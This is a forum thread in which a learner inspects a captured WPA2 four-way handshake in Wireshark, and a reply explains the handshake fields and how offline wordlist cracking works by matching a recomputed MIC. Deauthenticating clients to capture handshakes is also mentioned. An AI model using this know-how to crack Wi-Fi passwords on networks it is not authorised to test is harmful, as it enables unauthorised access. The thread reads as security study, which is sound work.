Results 1 to 4 of 4

Thread: Where're the goods in this WPA2 handshake?

  1. #1
    Join Date
    2017-May
    Location
    Here...
    Posts
    12

    Where're the goods in this WPA2 handshake?

    I'm still a bit on shaky ground when it comes to understanding the ins and outs of WPA vs WPA2-PSK handshakes. I think (but I'm not sure) that a lot of my confusion is caused by subtle differences in the way that differing sources use terminology. For example, earlier I was of the understanding that the the correct terms for the two security protocols were "WPA" and "WPA2-PSK", and I thought that I had it down correct that a WPA2-PSK network would have its authentication goods transmitted over the airwaves in the form of an ecrypted key, whereas a WPA network would have it's authentication goods transmitted over the airwaves in the form of a plain text PIN number.
    However, I happened across a www page earlier that listed the two network security protocols as WPA-PSK and WPA2-PSK.

    It does get frustrating at first, when the you think you have something down, then spot one or two takes on it that more or less shatter what you thought you knew. Then you backtrack a little bit, trying to salvage what you can of what you've already been basing some of your assumptions on... Then you move ahead a little bit more, gaining a small amount of knowledge and experience until the next time that s**t seems to hit the fan... And the cycle repeats, etc., etc., etc., ...

    This post is mainly during one of those "backtracking" phases, where I previously thought that I had a decent working perception of some things, but have recently started to notice that certain parts of that understanding are breaking down and not holding water as much as they previously used to. The thing is that I am unable to identify and/or explain exactly *** is going on. I only know that something is wrong somewhere, but cannot tell exactly where it is messed up.

    ===

    This post is also about me trying to hone in on what I should be looking for when examining a data capture with Wireshark. Basically, I have a capture of what I'm almost certain is a valid handshake (the four handshake packets passed all of the scrutiny that I could give them, and I was also watching Wireshark do its thing when I re-authenticated with the router and then seen it catch the four EAPOL packets as I re-authenticated).
    I'll be using the six images listed below as reference quite a bit. The image names, their descriptions, and the imagur links to them are:
    1) my_handshake.png; A screenshot of a Wireshark capture. The 4 EAPOL packets that make up the capture are in the middle of the pic (#'s 167,168,169,&170).
    http://imgur.com/a/0RmjL
    2) mh_pckt1.png; A screenshot of "Key (Message 1 of 4)".
    http://imgur.com/a/0RmjL
    3) mh_pckt2.png; A screenshot of "Key (Message 2 of 4)".
    http://imgur.com/a/0RmjL
    4) mh_pckt3.png; A screenshot of "Key (Message 3 of 4)".
    http://imgur.com/a/0RmjL
    5) mh_pckt4.png; A screenshot of "Key (Message 4 of 4)".
    http://imgur.com/a/0RmjL
    6) 4-way-handshake_WPA2.png; This is a pic of a WPA2 4-way handshake (I use it as desktop wallpaper because it helps me to memorize the pic better).
    http://imgur.com/a/0RmjL

    Also for reference is an article from http://www.kalitutorials.net/2014/06...handshake.html titled "Hack WPA/WPA2 PSK Capturing the Handshake". When I'm learning something from online, I'll try to use about 3-4 sources. That way, if there's any confusion about something then I can look at the other sources to see how they put it. Sometimes it helps to clear up some confusion, but mostly it just lets me know if my take on things is right or wrong.

    This particular handshake is of me authenticating with a netgear router over a WLAN network named "NETGEAR-Guest". Its security is WPA2.

    To begin with, after getting a capture and going through it to see if there might be a valid handshake in it, I spot the four packets with a "No." of 167, 168, 169, & 170 (see the screenshot "my_handshake.png"). Those four packets look like they could very well be a valid handshake because: 1)The packets are all of the EAPOL "Protocol"; 2)All four messages appear to have been successfully captured, as the "Info" field's values for those packets is "Key (Message 1 of 4)", "Key (Message 2 of 4)", "Key (Message 3 of 4)", and "Key (Message 4 of 4)"; 3)Lastly, what I notice about that screenshot is that the "Source" field for those packets appears as if communication has taken place between only two parties (between 86:1b:5e:42:b3:27 and IntelCor_e0:85:dd). Aside from the fact that the "Destination" field is empty for those four packets (I don't know why I never wondered too much about it before), all seems to be in good shape so far.
    So, after looking through the Wireshark capture and deciding that if there's a valid handshake in it, that it'll probably be those four packets, I look deeper into the first one (see "mh_pckt1.png") by highlighting packet #167 and then expanding the entries for "802.1x Authentication" and "WPA Key Data:". The replay counter is 0 for this first one. "It'll be great if the 2nd packet's replay counter is also 0, and then packets #3 and #4 both have a replay counter that's 1", I think to myself. Looking at it also with the diagram in "4-way-handshake_WPA2.png" in mind (I'm memorizing that particular diagram to get the handshake process down), I remember that the first step in the process is for an Anonce to go from the AP to the STA. This makes me wonder if (in the pic of the first packet) the entry "WPA Key Nonce: f2ba914be4b17a807d7b2db61e1f814e47f97d334e6bf718.. ." is what that Anonce refers to? If I got it correct, what I'm seeing is the AP sending an Anonce to the STA (& then the STA, or client, can go ahead with making the PTK)?
    Moving on to look at the 2nd packet (see "mh_pckt2.png") I can see that this one also has a replay counter of 0, so that's good. If I'm looking at the process of the STA sending an Snonce to the AP (together with a MIC), then I guess "WPA Key Nonce: d28cd01c5983d08156ffb305cf86d01810e5ac804e0f4d6c.. ." would be that Snonce that it's talking about. Looking at Wireshark's top pane, I'm thinking that the Source = 86:1b:5e:42:b3:27 must be the router (since that's the AP), and that Source = IntelCor_e0:85:dd must be the device that I was authenticating on (since that's the STA)? From the way that I understood this step in the handshake, the STA is also supposed to send a MIC, including authentication, which is really an MAIC. "Okay", I'm thinking, "I don't need to learn ALL of the particulars at this stage in my learning, but just improve my Wireshark capture reading skills some." Well, looking at the pic, I'm thinking that "WPA Key MIC: 9679ad0d48a613488e68577dadc970cf" might be the MIC and "WPA Key Data: 30140100000fac040100000fac040100000fac020000" might be the PTK (although I don't exactly remember reading that the PTK gets exposes over the airwaves)?
    Moving on to the 3rd packet (see "mh_pckt3.png")... This one has a replay counter of 1, so that's good. From what all I've learned about it so far, I think that this packet might be the golden goose (correct me if I'm wrong)? If I'm correct, this is the step where the AP sends a GTK and a sequence number with another MIC. Well, I don't know exactly what the GTK is, besides it maybe standing for "Global Temporal Key". Looking at the Wireshark capture for that packet, I guess the GTK might be "WPA Key Nonce: f2ba914be4b17a807d7b2db61e1f814e47f97d334e6bf718.. .", but I'd be lucky to be correct about that? The MIC looks to be "WPA Key MIC: ed8747d1f66d53e05c80171290e6a377"? And, the part that I'm really interested in is the "WPA Key Data: 12bfb55a99d08b44136c7fbf84075cebbec1d67fbf6b1f22.. ."? The entry just above that one shows its data length to be 56. Using that info along with the fact that the WPA Key Data seems to be incomplete (because it ends with "...") prompts me to look at Wireshark's bottom pane where the Hex dump is. There, the WPA Key Data is listed in its entirety? Unless I'm mistaken, isn't that WPA Key Data what I'll want to crack to get the ASCII form of the password??? If that's not the encrypted password that I'm wanting to be able to successfully authenticate with the router, then where should I look for the correct one (the last two questions are the money questions)???
    As for the fourth and final packet of the handshake ("mh_pckt4.png"), I didn't look at it much, beyond checking to see if its replay counter was also 1 (which it was). There's bound to be some errors in the above text with all the copying and pasting that I was doing, and the fact that I'm still learning about the whole WPA2-PSK handshake process.

    NOTE - I had written this post before knowing about it going here, so the image names that I have listed above are pretty useless. In the end, I posted all of the pics to an imgur album, instead of uploading them. The correct way that they are layed out is, from top to bottom: the four packets of the entire handshake, packet1, packet2, packet3, packet4, and a diagram of the wpa2-psk handshake process.

    Thanks for any feedback, comments, or corrections on this post.
    Give a man a fish and you feed him for a day. Don't give a man a fish and feed yourself instead. He's a grown man. And fishing's not that hard.

  2. #2
    Join Date
    2016-Oct
    Location
    /dev/sda
    Posts
    1,012
    There are some questions in your post. Can you list them at the bottom?

  3. #3
    Join Date
    2017-May
    Location
    Here...
    Posts
    12
    Okay. I was hesitant to edit the original post any in case I altered it and made it illegible, so I went through it and listed the questions in this post (an "*" precedes each question):


    In the original post, these first 3 questions are actually towards the end, but since they're the most important ones of the bunch, I've included them here as the first ones ( go to http://imgur.com/a/0RmjL and then scroll down to the 4th pic)...

    * Looking at packet3... Is the "WPA Key Data: 12bfb55a99d08b44136c7fbf84075cebbec1d67fbf6b1f22.. ." entry the encrypted key that needs to be cracked before it can then be used to access the network?

    * This is a continuation of the above question... The entry just above that one shows its data length to be 56. Using that info along with the fact that the WPA Key Data seems to be incomplete (because it ends with "...") prompts me to look at Wireshark's bottom pane where the Hex dump is. There, the WPA Key Data seems to be listed in its entirety. Unless I'm mistaken, isn't that WPA Key Data what I'll want (and need) to crack, to get the ASCII form of the password???

    * This is also a continuation of the above question... If that's not the encrypted password that I'm wanting, to be able to successfully authenticate with the router, then where should I look for the correct one (this question and the above 2 questions are the most important two in the entire post)???

    ===

    * This question is from the 1st paragraph in the OP (original post). There're no explicit "?"'s in that paragraph, but as I looked at it just now, I figured that I'd better fix any mis-understandings of them now if I can.
    I nearly always see only WPA2-PSK & WPA networks while scanning. I have seen one WEP network, but it was rare (probably around 1 in 40 or 50), and I would think that I'll probably see less and less of those as time goes by, so I only concern myself with the WPA2-PSK & WPA networks.
    In literature, nearly all of the sources that I've read list the two networks as being called either WPA2-PSK or WPA. So, after I was confident that I would be using the correct terms, I tended to use only the two terms "WPA2-PSK" & "WPA" to describe those two types of security.
    But then just the other day, I was reading an article and it gave a broad description of those two types of security that left me scratching my head a bit. Knowing what little bit I knew as of then, and also trying to reconcile what the article was saying, I began questioning the types of network security that do exist.
    So, those questions would be:
    Is there such a network security type that is termed "WPA" (without the "-PSK" suffexed to it)?
    Is there such a network security type that is termed "WPA-PSK"?
    Is there such a network security type that is termed "WPA2" (without the "-PSK" suffexed to it)?
    Is there such a network security type that is termed "WPA2-PSK"?
    The above four questions probably seem trivial to experts. The reason I ask them in the manner that they are written is because sometimes it seems as if some sources use network security terms either just a little bit incorrectly, or I am just mistaken in the way that I've interpreted things so far. See, I was of the impression that there is just WPA2-PSK or WPA but, once I seen an article put it as "WPA-PSK", I began to wonder if I had had it all wrong up to that point, because I've never seen a network security listed as being "WPA-PSK" in all of the captures that I've done (quite a lot of captures to me, but that amount would probably seem like a drop in the bucket to veterans). So, I'm just trying to poke holes in my understanding of them, so that I can get rid of any mistaken perceptions.

    * This question is mostly one of curiosity, but I don't think that it's a real important one. While writing the OP, I just noticed myself wondering about it for about the 10th time and wanted to know the answer to it if I could find one (sort of like swatting a bee that keeps hovering around you but not really doing any harm - it's just annoying after awhile).
    In the OP, at around the 7th paragraph down, where it reads, "...Destination field is empty for those four packets..." - Why is the Destination field for those four packets empty?
    What I mean is that when I navigate to http://imgur.com/a/0RmjL and then look at the top image (the one with the caption "The screenshot of an initial WPA2-PSK handshake."), I keep noticing that the four packets (# 167,168,169,&170) have an empty "Destination" field (the 3rd column from the left). For instance, the "Source field list has entries in it but the "Destination" field is emtpy for those four packets. I would expect the "Destination" field for those four packets to contain the same entries that're in the "Source" field, just in the opposite alternating order, but for some reason the "Destination" field is empty for those packets even though they are showing up in the Wireshark capture. Why is the "Destination" field for these four EAPOL packets empty?

    * This is the question in the OP that starts around the 8th paragraph ("So, after looking through the Wireshark capture..."). By looking at the pic captioned "packet1" (> http://imgur.com/a/0RmjL > 2nd pic down captioned "packet1").
    Looking at the middle pane in that pic, at the "WPA Key Nonce: f2ba914be4b17a807d7b2db61e1f814e47f97d334e6bf718.. ." entry... Is that the part of the handshake process where the AP sends a nonce value to the STA, and then the STA can make a pairwise transient key?

    * Taking a look into the second packet (> http://imgur.com/a/0RmjL > 3rd pic down, where caption = packet2)... Is the "WPA Key Nonce: d28cd01c5983d08156ffb305cf86d01810e5ac804e0f4d6c.. ." entry (the 6th entry above the highlighte entry, in the middle pane)... Is that entry the nonce value that the STA sends to the AP (along with an MIC - but the MIC is not included in this particular entry)?

    * Also looking at the pic where caption = packet2... Looking at Wireshark's top pane, I'm thinking that the Source = 86:1b:5e:42:b3:27 must be the router (since that's the AP), and that Source = IntelCor_e0:85:dd must be the device that I was authenticating on (since that's the STA)?
    This question arises because I'm just wanting to confirm or deny if my thinking is correct that the AP is often times the router, and the STA is the client (or the machine that you deauthenticate, so that it then reauthenticates allowing you to capture a handshake).

    * Also looking at the pic where caption = packet2... Is the "WPA Key MIC: 9679ad0d48a613488e68577dadc970cf" entry (in the pic, it's 2 up from the highlighted entry, in the middle pane) the MIC that's referred to in the following excerpt?
    [excerpt --->] "2) The STA sends its own nonce-value (SNonce) to the AP together with a MIC, including authentication, which is really a Message Authentication and Integrity Code: (MAIC)."

    * Also looking at the pic where caption = packet2... Is the "WPA Key Data: 30140100000fac040100000fac040100000fac020000" entry (the highlighted one in the middle pane) the PTK?
    I was thinking that it might be, although I don't remember ever reading that the PTK gets exposed over the airwaves? Or, maybe I'm just confusing the PTK with the PMK, and the PMK doesn't get shared over the network much, whereas the PTK might?

    * Finally, we reach the 3rd packet (caption = packet3). From what all I've learned about it so far, I think that this packet might be the encrypted key that needs to be cracked in order to gain access to the network (correct me if I'm wrong)?

    * Also looking at packet3... Is this the step in the handshake process where the AP sends the GTK (and a sequence number together with another MIC)?

    * Also looking at packet3... Is the "WPA Key Nonce: f2ba914be4b17a807d7b2db61e1f814e47f97d334e6bf718.. ." entry the GTK data?

    * Also looking at packet3... Is the "WPA Key MIC: ed8747d1f66d53e05c80171290e6a377" the MIC data that's referred to by the following excerpt?
    [excerpt --->] "3) The AP sends the GTK and a sequence number together with another MIC. This sequence number will be used in the next multicast or broadcast frame, so that the receiving STA can perform basic replay detection."

    ===

    Please don't hesitate to ask me to clear up anything else about this post or the original post. I'm pretty familiar with looking at the capture, so that I probably don't pick up on some things that may be confusing to others. I tried to be somewhat organized when writing the OP (original post), but it became so long that the organization for it that I had in mind at the onset quickly went to the wayside.
    Give a man a fish and you feed him for a day. Don't give a man a fish and feed yourself instead. He's a grown man. And fishing's not that hard.

  4. #4
    Join Date
    2016-Oct
    Location
    /dev/sda
    Posts
    1,012
    WPA is a general term referring to Wifi Protected Access algorithm. It has 2 types:
    WPA-PSK
    WPA-Enterprise
    Later its extension WPA2 was created which is more secure and faster in encryption and decryption. WPA types were also replaced by WPA2 as:
    WPA2-PSK
    WPA2-Enterprise

    When you see WPA/WPA2-PSK written it means WPA-PSK/WPA2-PSK. WPA is a little different from WPA2 so calling WPA2 as WPA is also incorrect if you want to avoid confusion between the two. WPA uses TKIP which is an encryption protocol and the encryption algorithm is RC4. WPA2 uses AES-CCMP for encryption which is faster than RC4 cryptography.

    In the 4 way handshake, packet 1 has Nonce generated by AP. Packet 2 has Nonce generated by client. WPA data in packet 1 and packet 2 is just a RSNA(Robust Security Network Algorithm) ID. It has no significant contribution in the handshake. It is just a packet format.

    In packet 3, the nonce is same as the nonce in packet 1 because it was generated by AP earlier. This time WPA data has encrypted GTK but even that is not used for wifi cracking.

    Open the frame tab of EAPOL packet, it has MAC header of 12 bytes. 6 bytes of Source MAC and 6 bytes of Destination MAC. Your destination MAC address must be listed there.

    So basically no actual key is sent over the network then how do you crack wifi password using wordlist?
    The solution is in the step 4 which is MIC or MAC(Message Authentication Code same thing) which i can see in the handshake. Just like client and AP initially start from your wifi password to generate keys and MIC using WPA/WPA2 algorithm, I also start from my wordlist and captured handshake to generate Keys and MIC using GPU. Then i check whether my MIC is matching with the MIC captured in the handshake earlier. If it is matching then you have the right password. The probability of having incorrect password but right MIC is 1/2^128 which is near to zero so it has very rare chance of happening.
    Last edited by _defalt; 2017-05-30 at 13:00.

Similar Threads

  1. Using Crackstation.Net for a WPA2 Handshake File
    By Bedrock1977 in forum General Archive
    Replies: 1
    Last Post: 2018-02-04, 01:11

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •